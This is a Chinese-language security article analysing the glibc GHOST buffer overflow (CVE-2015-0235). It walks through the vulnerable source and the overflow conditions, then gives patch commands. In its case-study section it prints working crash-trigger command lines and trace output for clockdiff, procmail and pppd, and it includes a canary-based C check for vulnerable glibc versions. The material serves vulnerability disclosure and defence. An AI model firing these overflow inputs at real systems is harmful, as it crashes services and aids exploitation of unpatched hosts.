CVE 2015-0235:Ghost glibc 缓存区溢出漏洞分析
安全脉搏此前发布了最近被媒体炒的比较火的2015年第一个曝出的影响广泛的底层漏洞: CVE-2015-0235:Linux Glibc幽灵漏洞允许黑客远程获取系统权限
一: 概述
__nss_hostname_digits_dots(//glibc/nss/digits_dots.c)函数存在缓冲区溢出漏洞。
该bug通过gethostbyname *()系列函数触发,可远程执行。
二:分析
__nss_hostname_digits_dots() 是从2.2.2开始引入的。
root@H:/tmp/glibc-2.17# grep -irF '__nss_hostname_digits_dots' ./* ./CANCEL-FCT-WAIVE:__nss_hostname_digits_dots ./ChangeLog.12: * nss/Versions (libc): Add __nss_hostname_digits_dots to GLIBC_2.2.2. ./ChangeLog.12: * nss/digits_dots.c (__nss_hostname_digits_dots): Turn template ---snip--- ./nss/getXXbyYY.c: if (__nss_hostname_digits_dots (name, &resbuf, &buffer, ./nss/Versions: __nss_hostname_digits_dots; ./nss/getXXbyYY_r.c: switch (__nss_hostname_digits_dots (name, resbuf, &buffer, NULL, ./nss/nsswitch.h:extern int __nss_hostname_digits_dots (const char *name, ./nss/nsswitch.h:libc_hidden_proto (__nss_hostname_digits_dots) ./nss/digits_dots.c:__nss_hostname_digits_dots (const char *name, struct hostent *resbuf, ./nss/digits_dots.c:libc_hidden_def (__nss_hostname_digits_dots)
查找得出该函数由glibc的重入和不可重入版本提供(nss/getXXbyYY.c 和 nss/getXXbyYY_r.c)
#ifdef HANDLE_DIGITS_DOTS
if (buffer != NULL) //if malloc memory success
{
if (__nss_hostname_digits_dots (name, &resbuf, &buffer,
&buffer_size, 0, &result, NULL, AF_VAL,
H_ERRNO_VAR_P))
goto done;
}
#endif
并由 HANDLE_DIGITS_DOTS 宏来定义
root@H:/tmp/glibc-2.17# grep -irF '#define HANDLE_DIGITS_DOTS' ./* ./inet/gethstbynm.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm2.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm_r.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm2_r.c:#define HANDLE_DIGITS_DOTS 1 ./nscd/gethstbynm3_r.c:#define HANDLE_DIGITS_DOTS 1
所以这几个文件对应的函数可能触发该漏洞,__nss_hostname_digits_dots()的目的是避免ipv4和ipv6的地址再去做dns解析导致资源浪费。
/* Copyright (C) 1997, 1999, 2000, 2001, 2004 Free Software Foundation, Inc. This file is part of the GNU C Library. Contributed by H.J. Lu <[email protected]>, 1997. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #include <assert.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <ctype.h> #include <wctype.h> #include <resolv.h> #include <netdb.h> #include <arpa/inet.h> #include "nsswitch.h" #ifdef USE_NSCD # define inet_aton __inet_aton # include <nscd/nscd_proto.h> #endif int __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, char **buffer, size_t *buffer_size, size_t buflen, struct hostent **result, enum nss_status *status, int af, int *h_errnop) { int save; /* We have to test for the use of IPv6 which can only be done by examining `_res'. */ if (__res_maybe_init (&_res, 0) == -1) { if (h_errnop) *h_errnop = NETDB_INTERNAL; *result = NULL; return -1; } /* * disallow names consisting only of digits/dots, unless * they end in a dot. */ if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') { const char *cp; char *hostname; typedef unsigned char host_addr_t[16]; host_addr_t *host_addr; typedef char *host_addr_list_t[2]; host_addr_list_t *h_addr_ptrs; char **h_alias_ptr; size_t size_needed; int addr_size; switch (af) { case AF_INET: addr_size = INADDRSZ; break; case AF_INET6: addr_size = IN6ADDRSZ; break; default: af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET; addr_size = af == AF_INET6 ? IN6ADDRSZ : INADDRSZ; break; } size_needed = (sizeof (*host_addr) + sizeof (*h_addr_ptrs) + strlen (name) + 1); if (buffer_size == NULL) { if (buflen < size_needed) { if (h_errnop != NULL) *h_errnop = TRY_AGAIN; __set_errno (ERANGE); goto done; } } else if (buffer_size != NULL && *buffer_size < size_needed) { char *new_buf; *buffer_size = size_needed; new_buf = (char *) realloc (*buffer, *buffer_size); if (new_buf == NULL) { save = errno; free (*buffer); *buffer = NULL; *buffer_size = 0; __set_errno (save); if (h_errnop != NULL) *h_errnop = TRY_AGAIN; *result = NULL; goto done; } *buffer = new_buf; } memset (*buffer, '\0', size_needed); host_addr = (host_addr_t *) *buffer; h_addr_ptrs = (host_addr_list_t *) ((char *) host_addr + sizeof (*host_addr)); h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs)); hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr); if (isdigit (name[0])) { for (cp = name;; ++cp) { if (*cp == '\0') { int ok; if (*--cp == '.') break; /* All-numeric, no dot at the end. Fake up a hostent as if we'd actually done a lookup. What if someone types 255.255.255.255? The test below will succeed spuriously... ??? */ if (af == AF_INET) ok = __inet_aton (name, (struct in_addr *) host_addr); else { assert (af == AF_INET6); ok = inet_pton (af, name, host_addr) > 0; } if (! ok) { *h_errnop = HOST_NOT_FOUND; if (buffer_size) *result = NULL; goto done; } resbuf->h_name = strcpy (hostname, name); h_alias_ptr[0] = NULL; resbuf->h_aliases = h_alias_ptr; (*h_addr_ptrs)[0] = (char *) host_addr; (*h_addr_ptrs)[1] = NULL; resbuf->h_addr_list = *h_addr_ptrs; if (af == AF_INET && (_res.options & RES_USE_INET6)) { /* We need to change the IP v4 address into the IP v6 address. */ char tmp[INADDRSZ]; char *p = (char *) host_addr; int i; /* Save a copy of the IP v4 address. */ memcpy (tmp, host_addr, INADDRSZ); /* Mark this ipv6 addr as a mapped ipv4. */ for (i = 0; i < 10; i++) *p++ = 0x00; *p++ = 0xff; *p++ = 0xff; /* Copy the IP v4 address. */ memcpy (p, tmp, INADDRSZ); resbuf->h_addrtype = AF_INET6; resbuf->h_length = IN6ADDRSZ; } else { resbuf->h_addrtype = af; resbuf->h_length = addr_size; } if (h_errnop != NULL) *h_errnop = NETDB_SUCCESS; if (buffer_size == NULL) *status = NSS_STATUS_SUCCESS; else *result = resbuf; goto done; } if (!isdigit (*cp) && *cp != '.') break; } } if ((isxdigit (name[0]) && strchr (name, ':') != NULL) || name[0] == ':') { const char *cp; char *hostname; typedef unsigned char host_addr_t[16]; host_addr_t *host_addr; typedef char *host_addr_list_t[2]; host_addr_list_t *h_addr_ptrs; size_t size_needed; int addr_size; switch (af) { default: af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET; if (af == AF_INET6) { addr_size = IN6ADDRSZ; break; } /* FALLTHROUGH */ case AF_INET: /* This is not possible. We cannot represent an IPv6 address in an `struct in_addr' variable. */ *h_errnop = HOST_NOT_FOUND; *result = NULL; goto done; case AF_INET6: addr_size = IN6ADDRSZ; break; } size_needed = (sizeof (*host_addr) + sizeof (*h_addr_ptrs) + strlen (name) + 1); if (buffer_size == NULL && buflen < size_needed) { if (h_errnop != NULL) *h_errnop = TRY_AGAIN; __set_errno (ERANGE); goto done; } else if (buffer_size != NULL && *buffer_size < size_needed) { char *new_buf; *buffer_size = size_needed; new_buf = realloc (*buffer, *buffer_size); if (new_buf == NULL) { save = errno; free (*buffer); __set_errno (save); *buffer = NULL; *buffer_size = 0; *result = NULL; goto done; } *buffer = new_buf; } memset (*buffer, '\0', size_needed); host_addr = (host_addr_t *) *buffer; h_addr_ptrs = (host_addr_list_t *) ((char *) host_addr + sizeof (*host_addr)); hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs); for (cp = name;; ++cp) { if (!*cp) { if (*--cp == '.') break; /* All-IPv6-legal, no dot at the end. Fake up a hostent as if we'd actually done a lookup. */ if (inet_pton (AF_INET6, name, host_addr) <= 0) { *h_errnop = HOST_NOT_FOUND; if (buffer_size) *result = NULL; goto done; } resbuf->h_name = strcpy (hostname, name); h_alias_ptr[0] = NULL; resbuf->h_aliases = h_alias_ptr; (*h_addr_ptrs)[0] = (char *) host_addr; (*h_addr_ptrs)[1] = (char *) 0; resbuf->h_addr_list = *h_addr_ptrs; resbuf->h_addrtype = AF_INET6; resbuf->h_length = addr_size; *h_errnop = NETDB_SUCCESS; if (buffer_size == NULL) *status = NSS_STATUS_SUCCESS; else *result = resbuf; goto done; } if (!isxdigit (*cp) && *cp != ':' && *cp != '.') break; } } } return 0; done: return 1; } libc_hidden_def (__nss_hostname_digits_dots)
85行size_needed决定了缓存区的大小 只包括了 *host_addr, *h_addr_ptrs, name的大小,后面121行却存储着四个数据的地址,host_addr, h_addr_ptrs, h_alias_ptr, hostname, 在计算长度时漏掉了h_alias_ptr,即一个char指针的大小,32位为4个字节,64位为8个字节。88-117行保证缓存区足够大,88-97行是函数重入的分支,98-117是非重入的分支。157行的strcpy可以触发缓存区溢出。
为了在157行触发溢出,主机名必须符合下列条件:
- 它的第一个字符必须是数字(Ln 127) 。 - 它的最后一个字符不能是点 “.”(Ln 135 ) 。 - 它必须只包含数字和点(Ln 197 ) (我们称之为“数字和点”的要求) 。 - 它必须足够长以溢出缓冲区。例如,非重入的gethostbyname *()函数最开始就会通过调用malloc (1024)来分配自己的缓冲区 (申请 “1 KB”) 。 - 地址必须成功地解析为IPv4地址。该解析由INET_ATON()(Ln 143)完成 ,或作为inet_pton IPv6地址() (Ln 147)
但是经过分析inet_pton 和 inet_aton 这2个函数,得出如下结论(200行出的strcpy是处理ipv6的,由于ipv6的限制,不能触发溢出。)
147行的inet_ption中当吧hostname解析为ipv6的地址时,':'是不非法字符,所以地址族为AF_INET6时,是不会触发的。 inet_aton处是唯一一处可以出发溢出的,并且主机名必须具有一下格式:"a.b.c.d","a.b.c","a",a,b,c,d 必须是无符号整数,最大0xffffffff,可以被strtoul函数成功的转换为10进制或8进制(由于'x'和'X'在此处是非法字符,所以不能为16进制)
三:案例分析
目前为止,下面的程序被证实存在该漏洞
- clockdiff
- procmail(through its comsat/biff feature)
- pppd
- Exim mail server (if configured with the “helo_verify_hosts” or “helo_try_verify_hosts” option)
clockdiff
root@h-virtual-machine:~# clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))") Segmentation fault (core dumped)
调用gethostbyname,执行__strdup时溢出
root@h-virtual-machine:~# ltrace clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))")
__libc_start_main(0x8048960, 2, 0xbfb52774, 0x8049cd0, 0x8049d40 <unfinished ...>
socket(2, 3, 1) = 3
__errno_location() = 0xb75d08c8
getuid() = 0
setuid(0) = 0
fileno(0xb7778ac0) = 0
isatty(0) = 1
fileno(0xb7778a20) = 1
isatty(1) = 1
getpid() = 9907
gethostname("h-virtual-machine", 1025) = 0
gethostbyname("h-virtual-machine") = 0xb777aef8
__strdup(0x91d502a, 1025, 1, 64, 4) = 0x91d55f0
gethostbyname("00000000000000000000000000000000"...) = 0xb777aef8
__strdup(0x91d5cec, 1025, 1, 64, 4 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
procmail
root@h-virtual-machine:~# ltrace /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
----snip---
socket(2, 2, 17) = 4
strlen("root@8:/var/mail/root") = 21
sendto(4, 0x83358c8, 21, 0, 0x805d7f8) = 21
close(4) = 0
strlen("procmail") = 8
memmove(0x8337168, 0x80580e3, 8, 0x10000000, 1) = 0x8337168
strlen(": ") = 2
memmove(0x8337170, 0x8058d78, 2, 0x10000000, 1) = 0x8337170
time(NULL) = 1422509804
strlen("Notified comsat:") = 16
memmove(0x8337172, 0x8059416, 16, 0x10000000, 1) = 0x8337172
strlen(" "") = 2
memmove(0x8337182, 0x80580ef, 2, 0, 0x8048838) = 0x8337182
strlen("root@8:/var/mail/root") = 21
memmove(0x8337184, 0x83358c8, 21, 0, 0x8048838) = 0x8337184
strlen(""\n") = 2
memmove(0x8337199, 0x80580ec, 2, 0x83358c8, 0x83358c8) = 0x8337199
write(2, "procmail: Notified comsat: "root"..., 51procmail: Notified comsat: "root@8:/var/mail/root"
) = 51
malloc(280) = 0x08337ee8
free(0x08337ee8*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x08337ee8 ***
由于破坏了内存结构,在free时出错。
pppd
root@h-virtual-machine:~# /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255' *** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09955920 *** ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x75f12)[0xb75b6f12] /lib/i386-linux-gnu/libc.so.6(+0x65de5)[0xb75a6de5] /lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75a6e1b] /usr/sbin/pppd(options_from_file+0xa8)[0x8064948] /usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] /usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] /usr/sbin/pppd(main+0x1cf)[0x8050b2f] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb755a4e3] ======= Memory map: ======== 08048000-08087000 r-xp 00000000 fd:01 11976 /usr/sbin/pppd 08087000-08088000 r--p 0003e000 fd:01 11976 /usr/sbin/pppd 08088000-0808c000 rw-p 0003f000 fd:01 11976 /usr/sbin/pppd 0808c000-080d9000 rw-p 00000000 00:00 0 09952000-09973000 rw-p 00000000 00:00 0 [heap] b74d5000-b74f1000 r-xp 00000000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b74f1000-b74f2000 r--p 0001b000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b74f2000-b74f3000 rw-p 0001c000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b7503000-b750e000 r-xp 00000000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b750e000-b750f000 r--p 0000a000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b750f000-b7510000 rw-p 0000b000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b7510000-b751a000 r-xp 00000000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751a000-b751b000 r--p 00009000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751b000-b751c000 rw-p 0000a000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751c000-b7532000 r-xp 00000000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7532000-b7533000 r--p 00015000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7533000-b7534000 rw-p 00016000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7534000-b7536000 rw-p 00000000 00:00 0 b7536000-b753d000 r-xp 00000000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753d000-b753e000 r--p 00006000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753e000-b753f000 rw-p 00007000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753f000-b7541000 rw-p 00000000 00:00 0 b7541000-b76e5000 r-xp 00000000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e5000-b76e6000 ---p 001a4000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e6000-b76e8000 r--p 001a4000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e8000-b76e9000 rw-p 001a6000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e9000-b76ec000 rw-p 00000000 00:00 0 b76ec000-b7720000 r-xp 00000000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7720000-b7721000 ---p 00034000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7721000-b7722000 r--p 00034000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7722000-b7723000 rw-p 00035000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7723000-b7726000 r-xp 00000000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7726000-b7727000 r--p 00002000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7727000-b7728000 rw-p 00003000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7728000-b7734000 r-xp 00000000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7734000-b7735000 r--p 0000b000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7735000-b7736000 rw-p 0000c000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7736000-b7737000 rw-p 00000000 00:00 0 b7737000-b773f000 r-xp 00000000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b773f000-b7740000 r--p 00007000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b7740000-b7741000 rw-p 00008000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b7741000-b7768000 rw-p 00000000 00:00 0 b7768000-b776a000 r-xp 00000000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b776a000-b776b000 r--p 00001000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b776b000-b776c000 rw-p 00002000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b777b000-b777e000 rw-p 00000000 00:00 0 b777e000-b777f000 r-xp 00000000 00:00 0 [vdso] b777f000-b779f000 r-xp 00000000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so b779f000-b77a0000 r--p 0001f000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so b77a0000-b77a1000 rw-p 00020000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so bfbb6000-bfbd8000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped)
pppd的ms-wins和socket选项也存在同样的问题。
glibc(补丁2013年5月21日就发布过了,不过没有引起重视).
查看有那些服务用了glibc, 用了这系列函数都有可能是潜在的威胁。
root@H:/tmp# lsof | grep libc | awk '{print $1}' | sort | uniq
accounts-
awk
bash
Cache
--snip--
gvfs-gpho
httpd
四:影响
服务器上gethostbyname() 函数用的挺多。许多DNS解析服务都可能会和这个漏洞有关。毕竟是底层库,影响还是挺大的。
·邮件服务器连接IP时,使用的DNS反查,DNS黑名单,SPF等机制 ·表单提交时,绕过允许用户内容导致一个DNS查询时,比如URL,WordPress的XML-RPC pingback等 ·MySQL服务器做基于主机名的认证检查时(以MySQL权限) ·SSH服务器对允许/拒绝规则认证时,使用DNS查询的 ·php中也有部分文件引用了这个函数。
可以用ltrace命令来看下是否用到了getbyhostname这类函数。
DNS查询都可能会触发这个漏洞,幸运的是漏洞并不会立刻造成提权,但是结合其他的漏洞或者bug导致提权就不得而知了。
五:poc
测试方法:
gcc secpulse.c -o CVE-2015-0235 ./CVE-2015-0235
secpulse.c
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
puts ("SecPulse.com Hint Your glibc version is:\t");
puts(gnu_get_libc_version ());
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}
修复方案
执行glibc升级命令
RHEL、Fedora、CentOS系统
yum update -y glibc --skip-broken
Debian、Ubuntu系统
apt-get clean && apt-get update && apt-get upgrade
update之后如果未生效,要重启依赖glibc的进程。
【本文来源:CVE 2015-0235:Ghost glibc 缓存区溢出漏洞分析 SP小编整理发布】